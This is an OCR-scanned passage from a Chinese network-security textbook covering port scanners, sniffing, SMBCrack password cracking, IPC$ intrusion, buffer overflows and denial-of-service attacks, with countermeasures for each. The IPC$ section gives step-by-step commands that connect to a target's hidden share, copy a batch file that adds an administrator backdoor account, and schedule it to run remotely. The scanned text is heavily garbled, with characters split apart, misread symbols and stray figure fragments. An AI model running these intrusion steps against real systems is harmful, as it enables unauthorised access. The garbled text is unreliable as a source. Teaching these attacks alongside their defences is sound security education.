nbtstat 命令 用 于 显示 本 地 计算 机 和 远程 计算 机 的 基于 TCP/IP 的 NetBIOS 统计 资料 、 
NetBIOS 名 称 表 和 NetBIOS 名 称 缓存 。nbtstat 命令 可 以 刷新 NetBIOS 名 称 缓存 和 使 用 
Windows Internet 名 称 服务 (WINS) 注 册 的 名 称 。 使 用 不 带 参数 的 nbtstat 命令 显示 帮助 
信息 。 

2. 扫描 器 

1) 扫描 器 的 作用 

对 于 扫描 器 的 理解 ,大 家 一 般 会 认为 ,这 只 是 黑客 进行 网 络 攻击 时 的 工具 。 扫 描 器 对 于 
攻击 者 来 说 是 必 不 可 少 的 工具 ,但 也 是 网 络 管理 员 在 网 络 安全 维护 中 的 重要 工具 。 因 为 扫 
描 软 件 是 系统 管理 员 掌 握 系统 安全 状况 的 必 备 工具 ,是 其 他 工具 所 不 能 替代 的 。 通 过 扫描 
工具 可 以 提前 发 现 系统 的 漏洞 , 打 好 补丁 ,做 好 防范 。 

扫描 器 的 主要 功能 如 下 。 

(1) 检测 主机 是 否 在 线 。 

(2) 扫描 目标 系统 开放 的 端口 ,有 的 还 可 以 测试 端口 的 服务 信息 。 

(3) 获取 目标 操作 系统 的 敏感 信息 。 

(4) 破解 系统 口令 。 

(5) 扫描 其 他 系统 敏感 信息 。 例 如 ,CGI Scanner、ASP Scanner、 从 各 个 主要 端口 取得 
服务 信息 的 Scanner 数据库 Scanner 以 及 木马 Scanner 等 。 

目前 各 种 扫描 器 软件 有 很 多 ,比较 著名 的 有 X-scan、 流 光 (Fluxay) 、X-Port、SuperScan、 
PortScan、Nmap、X-WAY 等 。 

2) 端口 扫描 

端口 扫描 是 入 侵 者 搜集 信息 的 常用 手法 .通过 端口 扫描 ,能 够 判断 出 目标 主机 开放 了 哪 
些 服务 、 运 行 哪 种 操作 系统 ,为 下 一 步 的 入侵 做 好 准备 。 端 口 扫描 尝试 与 目标 主机 的 某 些 端 
口 建立 TCP 连接 ,如 果 目 标 主机 端口 有 回复 , 则 说 明 该 端口 开放 , 即 为 “活动 端口 ”。 一 般 ， 
端口 扫描 可 分 为 以 下 4 种 方式 。 

(1) 全 TCP 连接 。 这 种 扫描 方法 使 用 "三 次 握手 ”, 与 目标 主机 建立 标准 的 TCP 连接 。 
这 种 方法 容易 被 目标 主机 记录 ,但 获取 的 信息 比较 详细 。 

(2) 半 打 开 式 扫描 (SYN 扫描 )。 扫 描 主 机 自动 向 目标 主机 的 指定 端口 发 送 SYN 报 
文 ,表示 发 送 建立 连接 请 求 。 由 于 扫描 过 程 中 全 连接 尚未 建立 ,所 以 大 大 降低 了 被 目标 主机 
记录 的 可 能 ,并 且 加 快 了 扫描 速度 。 
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@ 车 目标 主机 的 回应 TCP 报 文中 *SYN=1,ACK 王 1”, 则 说 明 该 端口 是 活动 的 , 接 下 
来 扫描 主机 发 送 一 个 RST 报 文 给 目标 主机 ,拒绝 建立 TCP 连接 ,从 而 导致 三 次 握手 的 
失败 。 

@ 车 目标 主机 的 回应 是 RST 报 文 , 则 表示 该 端口 不 是 活动 端口 。 这 种 情况 下 ,扫描 主 
机 不 做 任何 回应 。 

(3) FIN 扫描 。 依 靠 发 送 FIN 报 文 来 判断 目标 主机 的 指定 端口 是 否 活动 。 发 送 一 
FIN==1 的 TCP 报 文 到 一 个 关闭 的 端口 时 ,该 报 文 会 被 丢掉 ,并 返回 一 RT 科 光 : 伯 匠 当 
当 FIN 报 文 发 送 到 一 个 活动 端口 时 ,该 报 文 只 是 简单 地 丢掉 ,不 会 返回 任何 回应 。 从 中 可 
以 看 出 ,FIN 扫描 没有 涉及 任何 TCP 连接 部 分 .因此 这 种 扫描 比 前 两 种 都 安全 。 

(4) 第 三 方 扫描 (代理 扫描 )。 利 用 第 三 方 主机 来 代替 入 侵 者 进行 扫描 ,这 个 第 三 方 主 
机 一 般 是 入 侵 者 通过 入 侵 其 他 计算 机 而 得 到 的 ,该 主机 又 被 称 为 “肉鸡 ”, 一 般 是 安全 防御 系 
数 极 低 的 个 人 计算 机 。 

3) 扫描 工具 

(1) X-scan 扫描 器 。X-scan 是 国内 最 著名 的 综合 扫描 器 之 一 , 它 完全 免费 ,是 不 需要 
安装 的 绿色 软件 ,界面 支持 中 文 和 英文 两 种 语言 ,提供 了 图 形 界 面 和 命令 行 两 种 操作 方式 。 
X-scan 把 扫描 报告 和 “安全 焦点 ”网 站 相连 接 , 对 扫描 到 的 每 个 漏洞 进行 “风险 等 级 ”评估 ， 
并 提供 漏洞 描述 、 漏 洞 解决 方案 ,方便 网 络 管理 员 测 试 ,修补 漏洞 。X-Scan 的 主 界面 如 图 6-5 
所 示 。 























普通 信息 | 据 交 信息 | 错误 信息 | 
Ix-sean-v3.3 使 用 说 明 





| 一 ， 系统 要 求 : Windows NT/2000/XP/2003 
理论 上 可 运行 于 Windows IT 系列 操作 系统 ， 推 荐 运行 于 Windovs 2000 以 上 的 Server 版 indows 系 统 。 


kindex 
已 En 





xscan_ eui, exe 
checkkost, dat 
paate exe 


# dl 
使 用 说 明 . txt 














6-5 XX-Scan 的 主 界面 


X-Scan 的 使 用 步骤 如 下 。 

步骤 1: 设置 检测 范围 。 

步骤 2: 设置 扫描 模块 。 扫 描 模 块 包括 开放 服务 `.NT-Server 弱 口 令 `.NetBIOS 信息 、 
SNMP 信息 .远程 操作 系统 .TELNET 弱 口 令 、.SSH 弱 口 令 .REXEC 弱 口 令 、FTP 弱 口 令 、 
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SQL-Server 弱 口 令 ,WWW 弱 口 令 `.CVS 弱 口 令 `VNC 弱 口 令 `. POP3 弱 口 令 .SMTP 弱 口 
令 .IMAP 弱 口令 NNTP 弱 口 令 、SOCK5 弱 口 令 IIS 编码 /解码 漏洞 .漏洞 检测 脚本 等 
20 多 个 模块 。 

步骤 3: 设置 并 发 扫描 及 端口 相关 设置 。 

。 并 发 线程 : 值 越 大 速度 越 快 (建议 设 为 500)。 

。 并 发 主机 : 值 越 大 扫描 的 主机 越 多 (建议 设 为 10) 。 

。 建议 跳 过 ping 不 通 的 主机 。 

步骤 4: 设置 待 检测 端口 ,确定 检测 方式 。 检 测 方式 有 TCP 和 SYN 两 种 方式 。 

(2) 流光 (Fluxay) 扫 描 器 。 流 光 是 非常 优秀 的 扫描 工具 , 它 是 由 国内 高 手 小 榕 精心 打 
造 的 综合 扫描 器 。 其 功能 非常 强大 ,不 仅 能 够 像 X-Scan 那样 扫描 众多 漏洞 、 弱 口令 ,而 且 集 
成 了 常用 的 入侵 工具 ,如 字典 工具 .NTVIIS 工具 等 ,还 独创 了 能 够 控制 “ 肉 机 ?进行 扫描 的 
“流光 Sensor 工具 ?和 为 “ 肉 机 ?安装 服务 的 “种 植 者 ”工具 。 

(3) X-Port 扫描 器 。X-Port 提供 多 线程 方式 扫描 目标 主机 的 开放 端口 ,扫描 过 程 中 根 
据 TCP/IP 堆栈 特征 被 动 识别 操作 系统 类 型 ,车 没有 匹配 记录 ,尝试 通过 NetBIOS 判断 是 
否 为 Windows 系列 操作 系统 ,并 尝试 获取 系统 的 版 本 信息 。 

(4) SuperScan 扫描 器 。SuperScan 是 一 个 集 * 端 口 扫描 ”ping”” 主 机 名 解析 ”于 一 体 的 
扫描 器 。 其 功能 如 下 。 

@ 检测 主机 是 否 在 线 。 

@ IP 地 址 和 主机 名 之 间 的 相互 转换 。 

@ 通过 TCP 连接 试探 目标 主机 运行 的 服务 。 

@ 扫描 指定 范围 的 主机 端口 。 

@ 支持 使 用 文件 列表 来 指定 扫描 主机 范围 。 

(5) 其 他 端口 扫描 工具 。 包 括 PortScan、Nmap、X-WAY 等 。 


6.3.3 网 络 监 听 


在 项 目 3 中 介绍 了 一 种 网 络 流量 分 析 的 技术 , 即 网 络 监听 。 网 络 监听 是 黑客 在 局 域 网 
中 常用 的 一 种 技术 ,在 网 络 中 监听 其 他 人 的 数据 包 ,分 析 数 据 包 , 从 而 获得 一 些 敏 感 信息 ,如 
账号 和 密码 等 。 网 络 监 听 原 本 是 网 络 管理 员 经 常 使 用 的 一 个 工具 ,主要 用 来 监视 网 络 的 流 
量 , 状 态 .数据 等 信息 ,比如 Sniffer Pro 就 是 许多 网 络 管理 员 的 必 备 工具 。 另 外 ,分 析 数 据 
包 对 于 防 黑客 技术 (如 对 扫描 过 程 、 攻 击 过 程 有 深入 了 解 ) 也 非常 重要 ,从 而 对 防火 墙 制定 相 
应 规则 来 防范 。 所 以 网 络 监听 工具 和 网 络 扫描 工具 一 样 , 也 是 一 把 双 刃 剑 , 要 正确 地 对 待 。 

对 于 网 络 监听 ,可 以 采取 以 下 措施 进行 防范 。 

(1) 加 密 。 一 方面 ,可 以 对 数据 流 中 的 部 分 重要 信息 进行 加 密 ; 另 一 方面 ,也 可 只 对 应 
用 层 加 密 , 后 者 将 使 大 部 分 与 网 络 和 操作 系统 有 关 的 敏感 信息 失去 保护 。 选 择 何 种 加 密 方 
式 取决 于 信息 的 安全 级 别 及 网 络 的 安全 程度 。 

(2) 划分 VLAN。VLAN( 虚 拟 局 域 网 ) 技 术 可 以 有 效 缩小 冲突 域 ,通过 划分 VLAN 能 
防范 大 部 分 基于 网 络 监听 的 入 侵 。 
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6.3.4 口令 破解 


1. 口令 破解 概述 

为 了 安全 起 见 , 现 在 几乎 所 有 的 系统 都 通过 访问 控制 来 保护 自己 的 数据 。 访问 控 制 最 
常用 的 方法 就 是 口令 (密码 ) 保 护 , 口 令 应 该 说 是 用 户 最 重要 的 一 道 防护 门 。 攻 击 者 攻击 目 
标 是 常常 把 破解 用 户 的 口令 作为 攻击 的 开始 。 只 要 攻击 者 能 猜测 到 或 者 确定 用 户 的 口令 ， 
就 能 获得 机 器 或 网 络 的 访问 权 , 并 能 访问 到 用 户 可 以 访问 到 的 任何 资源 。 如 果 这 个 用 户 有 
管理 员 的 权限 ,将 是 极其 危险 的 。 

一 般 攻击 者 常常 通过 下 面 几 种 方法 获取 用 户 的 密码 口令 : 暴力 破解 .Sniffer 密码 嗅 探 \ 社 
会 工程 学 ( 即 通 过 欺诈 手段 获取 ) 以 及 木马 程序 或 键盘 记录 程序 等 。 下 面 主要 讲解 暴力 破解 。 

系统 账户 密码 的 暴力 破解 主要 是 基于 密码 匹配 的 破解 方法 ,最 基本 的 方法 有 两 个 : 穷 

举 法 和 字典 法 。 穷 举 法 是 效率 最 低 的 办 法 ,将 字符 或 数字 按照 穷 举 的 规则 生成 口令 字符 串 ， 
进行 遍历 尝试 。 在 口令 稍微 复杂 的 情况 下 , te i 字典 法 相对 来 说 破解 
速度 较 高 ,用 口令 字典 中 事先 定义 好 的 常用 字符 去 尝试 匹配 口令 。 口 令 字典 是 一 个 很 大 的 
文本 文件 ,可 以 通过 自己 编辑 或 者 由 字典 工具 生成 ,里 面包 含 了 单词 或 者 数字 的 组 合 。 如 果 
密码 是 一 个 单词 或 者 是 简单 的 数字 组 合 ,那么 破解 者 就 可 以 很 轻易 地 破解 密码 。 

常用 的 密码 破解 工具 和 审核 工具 有 很 多 ,如 Windows 平台 的 SMBCrack、LOphtCrack、 
SAMInside 等 。 通 过 这 些 工 具 的 使 用 ,可 以 了 解 口令 的 安全 性 。 随 着 网 络 黑客 技术 的 增强 
和 提高 ,许多 口令 都 可 能 被 攻击 和 破译 ,这 就 要 求 用 户 提高 对 口令 安全 的 认识 。 

2. 口令 破解 示例 

SMBCrack 是 基于 Windows 持 统 的 口令 破解 工具 ,使 用 了 SMB 协议 。 因 为 Windows 
可 以 在 同一 个 会 话 内 进行 多 次 口令 试探 ,所 以 用 SMBCrack 可 以 破解 操作 系统 的 口令 。 

假设 目标 主机 的 用 户 名 为 abc. 密 码 为 123456, 为 了 提高 实验 效果 ,提前 制作 好 
件 user. txt 和 pass. txt, 口 令 破 解 结果 如 图 6-6 所 示 。 


































典 文 


WSVsystea32Vcad exe [Ex| 





-— SMB Password Statistics 一 


rotal tries 5 in 8.85 seconds 
rries per second = 186.38 


rotal accounts 4, conpronised 1, disabled 8, skiped 日 
Penetration ratio = 25-98 x 


| B516/12 22:11:37 All Done 一 


图 6-6 SMBCrack 密码 破解 
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针对 暴力 破解 , Windows 操作 系统 有 很 有 效 的 防护 方法 ,只 要 启动 账户 锁定 策略 就 可 
以 了 。 如 果 操 作 系统 口令 被 破解 了 ,黑客 就 可 以 利用 一 些 工 具 获 得 对 方 系统 的 Shell, 那 么 
用 户 的 信息 将 很 容易 被 窃取 。 

3. 口令 破解 的 防范 

对 网 络 用 户 的 用 户 名 和 口令 (密码 ) 进 行 验证 ,是 防止 非法 访问 的 第 一 道 防线 。 用 户 在 
注册 网 络 时 , 需 输入 用 户 名 和 密码 ,服务 器 将 验证 其 合法 性 。 在 用 户 名 与 密码 两 者 之 中 , 密 
码 是 问题 的 关键 所 在 。 据 统计 ,大 约 80% 的 安全 隐患 是 由 于 密码 设置 不 当 引 起 的 。 因 此 ， 
密码 的 设置 无 疑 是 十 分 讲求 技巧 的 。 

若 欲 保证 密码 的 安全 ,应 当 遵循 以 下 规则 。 

(1) 用 户 密码 应 包含 英文 字母 的 大 小 写 .数字 和 可 打印 字符 ,甚至 是 非 打 印字 符 , 将 这 
些 符号 排列 组 合 使 用 ,以 期 达到 最 好 的 保密 效果 。 

(2) 用 户 密码 不 要 太 规 则 ,不 要 使 用 用 户 姓 名 、 生 日 .电话 号 码 、 常 用 单词 等 作为 密码 。 

(3) 根据 黑客 软件 的 工作 原理 ,参照 密码 破译 的 难 易 程 度 ,以 破解 需要 的 时 间 为 排序 指 
标 ,密码 长 度 设置 时 应 遵循 7 位 或 14 位 的 整数 倍 原则 。 

(4) 在 通过 网 络 验证 密码 的 过 程 中 ,不 得 以 明文 方式 传输 ,以 免 被 监听 截获 。 

(5) 密码 不 得 以 明文 方式 存储 在 系统 中 ,确保 密码 以 加 密 的 形式 写 在 硬盘 上 且 包 含 密 
码 的 文件 是 只 读 的 。 

(6) 密码 应 定期 修改 ,避免 重复 使 用 旧 密 码 , 采 用 多 套 密码 的 命名 规则 。 

(7) 建立 账号 锁定 机 制 。 一 旦 同一 账号 密码 校 验 错误 若干 次 即 断 开 连 接 并 锁定 该 账 
号 ,经 过 一 段 时 间 以 后 才能 解锁 。 


6.3.5 IPC$ 入 侵 


1. IPC$ 概述 

IPC$ 是 Windows 系统 特有 的 一 项 管理 功能 ,是 Microsoft 公司 为 了 方便 用 户 使 用 计 
算 机 而 设 定 的 ,主要 用 来 远程 管理 计算 机 。 事 实 上 使 用 这 个 功能 最 多 的 人 不 是 网 络 管理 员 ， 
而 是 入 侵 者 。IPC 后 面 的 $ 表示 它 是 隐藏 的 共享 。 通 过 IPC $ 连接 ,入 侵 者 能 够 实现 控制 
目标 主机 。 

IPC(internet process connection) 是 共享 “命名 管道 ”的 资源 , 它 是 为 了 让 进程 间 通 信和 而 
开放 的 命名 管道 ,可 以 通过 验证 用 户 名 和 口令 来 获得 相应 的 权限 ,在 建立 连接 时 ,如 果 使 用 
空 的 用 户 名 和 密码 所 建立 起 来 的 连接 , 称 为 空 连接 。 空 连接 相当 于 匿名 访问 ,权限 很 低 ,但 
可 枚 举 出 目标 主机 的 用 户 名 列表 。 不 过 ,通过 修改 注册 表 可 禁止 枚 举 出 用 户 列 表 。 在 获得 
用 户 列表 后 ,使 用 密码 字典 ,可 进行 密码 探测 ,或 通过 密码 暴力 破解 ,来 获得 账户 的 密码 。 

2. IPC$ 入 侵 方法 

1) IPC$ 连接 的 建立 与 断 开 

(1) 建立 IPC$ 连 接 。 假 设 192. 168. 1. 104 主机 的 用 户 名 为 abc, 密 码 为 123456, 则 输 
人 以 下 命令 。 





net use \\192.168.1.104\IPC$ "123456" /user: "abc" 
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若 要 建立 空 连接 , 则 输入 以 下 命令 。 
net use \\192.168.1.104\IPC$ "" /user: "" 


(2) 建立 网 络 驱 动 器 ,输入 以 下 命令 。 





net use z: \\192.168.1.104\C$ 

车 要 删除 网 络 驱 动 器 ,输入 以 下 命令 。 
net use z:/delete 

(3) 断 开 IPC$ 连接 。 输 入 以 下 命令 。 
net use \\192.168.1.104\IPC$ /delete 


2) 建立 后 门 账号 

(1) 编写 批 处 理 文件 。 在 “记事 本 ”中 输入 “net user sysback 123456/add” 和 “net 
localgroup administrators sysback/add” 命 令 , 另 存 为 hack. bat 文件 。 

(2) 与 目标 主机 建立 IPC$ 连接。 

(3) 复制 文件 到 目标 主机 。 输 入 “copy hack. bat \\192. 168. 1. 104\C$ ”命令 ,把 hack. bat 
文件 复制 到 目标 主机 的 C 盘 中 。 

(4) 通过 计划 任务 使 远程 主机 执行 hack. bat 文件 ,输入 “net time \\192. 168. 1.104” 命 
令 , 查 看 目标 系统 时 间 。 

(5) 假设 目标 系统 的 时 间 为 22:30, 则 可 输入 “at \\192. 168. 1. 104 22:35 c:\hack. bat” 
命令 ,计划 任务 添加 完毕 后 ,使 用 “net use * /delete” 命 令 , 断 开 IPC$ 连接 。 

(6) 验证 账号 是 否 成 功 建立 。 等 一 段 时 间 后 ,估计 远程 主机 已 经 执行 了 hack. bat 文件 。 
通过 sysback 账号 建立 IPC$ 连接 。 若 连接 成 功 , 说 明 sysback 后 门 账号 已 经 成 功 建立 。 

3. IPC$ 入 侵 的 防范 

IPC$ 在 为 管理 员 提 供 了 方便 的 同时 ,也 留 下 了 严重 的 安全 隐患 ,防范 IPC$ 入 侵 的 方 
法 有 以 下 4 种 。 

(1) 删除 默认 共享 。 

(2) 禁止 利用 空 连接 进行 用 户 名 枚 举 攻击 。 在 注册 表 中 ,把 HKEY_LOCAL_ 
MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 中 的 restrictanonymous 子 键 的 值 
改 为 1。 修 改 完毕 后 重新 启动 计算 机 ,这 样 便 禁止 了 利用 空 连接 进行 用 户 名 枚 举 攻击 
Cnbtstat -a IP)。 不 过 要 说 明 的 是 ,这 种 方法 并 不 能 禁止 建立 空 链 接 。 

(3) 关闭 Server 服务 。Server 服务 是 IPC $ 和 默认 共享 所 依赖 的 服务 ,如 果 关 闭 
Server 服务 ,IPC $ 和 默认 共享 便 不 存在 ,但 同时 服务 器 也 丧失 了 其 他 一 些 服务 ,因此 该 方 
法 只 适合 个 人 计算 机 使 用 。 

(4) 屏 项 139、445 端口 。 没 有 这 两 个 端口 的 支持 ,是 无 法 建立 IPC$ 连接 的 ,因此 屏蔽 
139、445 端口 同样 可 以 阻止 I PC$ 入 侵 。 


6.3.6 ”缓冲 区 溢出 攻击 


缓冲 区 溢出 是 一 种 非常 普通 ,非常 危险 的 漏洞 ,在 各 种 操作 系统 .应 用 软件 中 广泛 存在 
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着 。 利 用 缓冲 区 浇 出 漏洞 ,可 以 执行 非 授权 指令 ,甚至 可 以 取得 系统 管理 员 权限 ,进行 各 种 
非法 操作 。 

1. 缓冲 区 溢出 原理 

缓冲 区 溢出 攻击 是 指 通 过 向 程序 的 缓冲 区 写 入 超出 其 长 度 的 内 容 ,造成 缓冲 区 的 溢出 ， 
从 而 破坏 程序 的 堆栈 ,使 程序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 造 成 缓冲 区 溢出 的 原 
因 是 没有 仔细 检查 程序 中 用 户 输入 的 参数 。 例 如 下 面 的 程序 : 

#include <stdio.h> 


#include < string.h> 
char bigbuffer[]="0123456789"7 








main () 
‘ 

char smallbuffer[5]; 

strcpy (smallbuffer,bigbuffer); 
} 


上 面 的 strcpy() 将 bigbuffer 中 的 内 容 复制 到 smallbuffer 中 。 因 为 bigbuffer 中 的 字符 
数 (10) 大 于 smallbuffer 能 容纳 的 字符 数 (5) ,造成 smallbuffer 的 溢出 ,使 程序 运行 出 错 。 

通过 制造 缓冲 区 溢出 使 程序 运行 一 个 用 户 shell, 再 通过 shell 执行 其 他 命令 。 如 果 该 
程序 属于 root 且 有 suid 权限 ,攻击 者 就 获得 了 一 个 有 root 权限 的 shell, 可 以 对 系统 进行 任 
意 操 作 。 

2. 缓冲 区 溢出 攻击 的 防范 

缓冲 区 溢出 攻击 的 防范 主要 从 操作 系统 安全 和 程序 设计 两 方面 实施 。 操 作 系统 安全 是 
最 基本 的 防范 措施 ,方法 也 很 简单 ,就 是 及 时 下 载 和 安装 系统 补丁 。 程 序 设计 方面 的 措施 主 
要 有 以 下 几 个 方面 。 

(1) 编写 正确 的 代码 。 编 写 正 确 的 代码 是 一 件 有 意义 但 耗 时 的 工作 ,尽管 人 们 知道 了 
如 何 编写 安全 的 程序 ,具有 安全 漏洞 的 程序 依旧 出 现 ,因此 人 们 开发 了 一 些 工 具 和 技术 来 帮 
助 程序 员 编 写 安全 正确 的 程序 。 

(2) 非 执行 的 缓冲 区 。 通 过 使 被 攻击 程序 的 数据 段 地 址 空间 不 可 执行 ,从 而 使 攻击 者 
不 可 能 执行 被 攻击 程序 输入 缓冲 区 的 代码 ,这 种 技术 被 称 为 非 执行 的 缓冲 区 技术 。 

(3) 数组 边界 检查 。 数 组 边界 检查 完全 防止 了 缓冲 区 溢出 的 产生 和 攻击 ,但 相对 而 言 
代价 较 大 。 

(4) 程序 指针 失效 前 进行 完整 性 检查 。 即 便 一 个 攻击 者 成 功 地 改变 了 程序 的 指针 ,由 
于 系统 事先 检测 到 了 指针 的 改变 ,因此 这 个 指针 将 不 会 被 使 用 。 虽然 这 种 方法 不 能 使 所 有 
的 缓冲 区 溢出 失效 ,但 能 阻止 绝 大 多 数 的 缓冲 区 溢出 攻击 。 


6.3.7 拒绝 服务 攻击 


1. 拒绝 服务 攻击 的 定义 
拒绝 服务 (Denial of Services,DoS) 攻 击 从 广义 上 讲 可 以 指 任何 导致 网 络 设备 (服务 器 、 
防火 墙 、 交 换 机 、 路 由 器 等 ) 不 能 正常 提供 服务 的 攻击 ,现在 一 般 指 的 是 针对 服务 器 的 DoS 
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攻击 。 这 种 攻击 可 能 是 网 线 被 拔 下 或 者 网 络 的 交通 堵塞 等 ,最 终结 果 是 正常 用 户 不 能 使 用 
所 需要 的 服务 。 

从 网 络 攻击 的 各 种 方法 和 所 产生 的 破坏 情况 来 看 ,DoS 是 一 种 很 简单 但 又 很 有 效 的 攻 
击 方式 。 尤 其 是 对 于 ISP、 电 信 部 门 还 有 DNS 服务 器 、Web 服务 器 、 防 火 墙 等 来 说 ,DoS 攻 
击 的 影响 都 是 非常 大 的 。 

2. 拒绝 服务 攻击 的 目的 

DoS 攻击 的 目的 是 拒绝 服务 访问 ,破坏 组 织 的 正常 运行 ,最 终 会 使 部 分 Internet 连接 和 
网 络 系统 失效 。 有 些 人 认为 DoS 攻击 是 没有 用 的 ,因为 DoS 攻击 不 会 直接 导致 系统 渗透 。 
但 是 ,黑客 使 用 DoS 攻击 有 以 下 目的 。 

(1) 使 服务 器 崩溃 并 让 其 他 人 也 无 法 访问 。 

(2) 黑客 为 了 冒充 某 个 服务 器 ,就 对 其 进行 DoS 攻击 ,使 之 瘫痪 。 

(3) 黑客 为 了 启动 安装 的 木马 ,要 求 系统 重新 启动 ,DoS 攻击 可 以 用 于 强制 服务 器 重新 
启动 。 

3. 拒绝 服务 攻击 的 原理 

DoS 攻击 就 是 想 办 法 让 目标 机 器 停止 提供 服务 或 资源 访问 ,这 些 资源 包括 磁盘 空间 、 内 
存 、 进 程 甚至 网 络 带宽 ,从 而 阻止 正常 用 户 的 访问 。 

DoS 攻击 的 方式 有 很 多 种 ,根据 其 攻击 的 手法 和 目的 不 同 , 主 要 有 以 下 两 种 不 同 的 存在 
形式 。 

(1) 资源 耗 尽 攻击 。 指 攻击 者 以 消耗 主机 的 可 用 资源 为 目的 ,使 目标 服务 器 忙于 应 付 
大 量 非法 的 无 用 的 连接 请 求 ,占用 了 服务 器 所 有 的 资源 ,造成 服务 器 对 正常 的 请 求 无 法 再 
做 出 及 时 响应 ,从 而 形成 事实 上 的 服务 中 断 , 这 也 是 最 常见 的 拒绝 服务 攻击 形式 。 这 种 攻击 
主要 利用 的 是 网 络 协议 或 者 是 系统 的 一 些 特点 和 漏洞 进行 攻击 ,主要 的 攻击 方法 有 死亡 之 
Ping、SYN Flood、UDP Flood ICMP Flood、Land、Teardrop 等 ,针对 这 些 漏洞 的 攻击 ,目前 
在 网 络 中 都 有 大 量 的 工具 可 以 利用 。 

(2) 带宽 耗 尽 攻击 。 指 攻击 者 以 消耗 服务 器 链 路 的 有 效 带 宽 为 目的 ,通过 发 送 大量 的 
有 用 或 无 用 的 数据 包 ,将 整 条 链 路 的 带宽 全 部 占用 ,从 而 使 合法 用 户 请 求 无 法 通过 链 路 到 达 
服务 器 。 例 如 ,蠕虫 对 网 络 的 影响 。 具 体 的 攻击 方式 有 很 多 ,如 发 送 垃圾 邮件 ,向 匿名 FTP 
传送 垃圾 文件 ,把 服务 器 的 硬盘 塞 满 ;合理 利用 策略 锁定 账户 ,一 般 服务 器 都 有 关于 账户 锁 
定 的 安全 策略 , 某 个 账户 连续 3 次 登录 失败 ,那么 这 个 账户 将 被 锁定 。 破 坏 者 伪装 一 个 账户 
去 错误 地 登录 ,使 这 个 账户 被 锁定 ,正常 的 合法 用 户 则 不 能 使 用 这 个 账户 登录 系统 了 。 

4. 常见 拒绝 服务 攻击 类 型 及 防范 方法 

以 下 是 几 种 常见 的 拒绝 服务 攻击 类 型 及 防范 方法 。 

1) 死亡 之 Ping 

死亡 之 Ping(Ping of Death) 是 最 古老 、 最 简单 的 拒绝 服务 攻击 , 它 发 送 大 于 65 535 字 
节 的 ICMP 数据 包 , 如 果 ICMP 数据 包 的 尺寸 超过 64KB 上 限时 ,主机 就 会 出 现 内 存 分 配 错 
误 ,导致 TCP/IP 堆栈 崩 江 ,致使 主机 死机 。 

此 外 ,向 目标 主机 长 时 间 、 连 续 、 大 量 地 发 送 ICMP 数据 包 最 终 也 会 使 系统 瘫痪 。 大 量 
的 ICMP 数据 包 会 形成 “ICMP 风暴 ”, 使 目标 主机 耗费 大 量 的 CPU 资源 。 

正确 地 配置 操作 系统 和 防火 墙 \ 阻 断 ICMP 以 及 任何 未 知 协议 都 可 以 防范 此 类 攻击 。 
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2) SYN Flood 攻击 

SYN Flood 攻击 利用 的 是 TCP 协议 缺陷 。 通 常 一 次 TCP 连接 的 建立 包括 3 次 握手 过 程 : 
(1) 客户 端 发 送 SYN 包 给 服务 器 。 

(2) 服务 器 分 配 一 定 的 资源 并 返回 SYN 十 ACK 包 , 并 等 待 连接 建立 的 最 后 的 


ACK 包 。 
(3) 客户 端 发 送 ACK 包 。 这 样 两 者 之 间 的 连接 建立 起 来 ,并 可 以 通过 连接 传送 数据 。 
SYN Flood 攻击 就 是 疯狂 地 发 送 SYN 包 , 而 不 返 DSYN 





标准 规定 必须 重 发 SYN 十 ACK 包 , 一 直到 超时 才 将 此 
条 目 从 未 连接 队列 中 删除 。SYN Flood 攻击 消耗 CPU 
和 内 存 资源 ,导致 系统 资源 占用 过 多 ,没有 能 力 响应 其 
他 操作 ,或 者 不 能 响应 正常 的 网 络 请 求 ,如 图 6-7 所 示 。 图 6-7 SYN Flood 攻击 
由 于 TCP/IP 相信 数据 包 的 源 IP 地 址 ,攻击 者 还 

可 以 伪造 源 IP 地 址 ,如 图 6-8 所 示 ,给 追查 造成 很 大 的 困难 。SYN Flood 攻击 除了 能 影响 
主机 外 ,还 危害 路 由 器 、 防 火 墙 等 网 络 系统 ,事实 上 SYN Flood 攻击 并 不 管 目标 是 什么 系 
统 , 只 要 这 些 系统 打开 TCP 服务 就 可 以 实施 。 


回 ACK 包 , 当 服务 器 未 收 到 客户 端的 ACK 包 时 ,规范 昌 a 


@ACK 





攻击 机 。_@ 下 一 个 SYN ”服务 器 


@SYN+ACK 


H+ 虚假 IP 地 址 
i @ 等 待 ACK 
攻击 机 服务 器 ”一 一- 


6-8 ”伪造 源 IP 地 址 的 SYN Flood 攻击 








SYN Flood 攻击 实现 起 来 非常 简单 ,网 络 上 有 大 量 现成 的 SYN Flood 攻击 工具 ,如 
xdos、Pdos、SYN-Killer 等 。 以 xdos 为 例 , 选 择 随机 的 源 IP 地 址 和 源 端口 ,并 填写 目标 机 器 
IP 地 址 和 TCP 端口 ,运行 后 就 会 发 现 目标 系统 运行 缓慢 ,甚至 死机 。UDP Flood ICMP 
Flood 攻击 的 原理 与 SYN Flood 攻击 类 似 。 

关于 SYN Flood 攻击 的 防范 ,目前 许多 防火 墙 和 路 由 器 都 可 以 做 到 。 首 先 关闭 不 必要 
的 TCP/IP 服务 ,对 防火 墙 进行 配置 ,过 滤 来 自 同一 主机 的 后 续 连 接 , 然 后 根据 实际 的 情况 
来 判断 。 

3) Land 攻击 

Land 攻击 是 打造 一 个 特别 的 SYN 包 , 包 的 源 IP 地 址 和 目标 IP 地 址 都 被 设置 成 被 攻 
击 的 服务 器 IP 地 址 ,这 时 将 导致 服务 器 向 自己 的 IP 地 址 发 送 SYN 十 ACK 包 , 结 果 这 个 IP 
地 址 又 发 回 ACK 包 并 创建 一 个 空 连接 ,每 一 个 这 样 的 连接 都 将 保留 直到 超时 。 

不 同 的 系统 对 Land 攻击 的 反应 不 同 , 许 多 UNIX 系统 会 崩溃 ,而 Windows 会 变 得 极 
其 缓慢 (大 约 持续 5min) 。 

4) Teardrop 攻击 

Teardrop( 泪 珠 ) 攻 击 的 原理 是 ,IP 数据 包 在 网 络 中 传递 时 ,数据 包 可 以 分 成 更 小 的 片 
段 ,攻击 者 可 以 通过 发 送 两 段 (或 者 更 多 ) 数 据 包 来 实现 。 第 一 个 包 的 偏 移 量 为 0, 长 度 为 
NN; 第 二 个 包 的 偏 移 量 小 于 N。 为 了 合并 这 些 数据 段 ,TCP/IP 堆栈 会 分 配 超 乎 寻常 的 巨大 
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资源 ,从 而 造成 系统 资源 的 缺乏 甚至 机 器 的 重新 启动 。 
关于 Land 攻击 、Teardrop 攻击 的 防范 ,给 系统 打上 最 新 的 补丁 即 可 。 


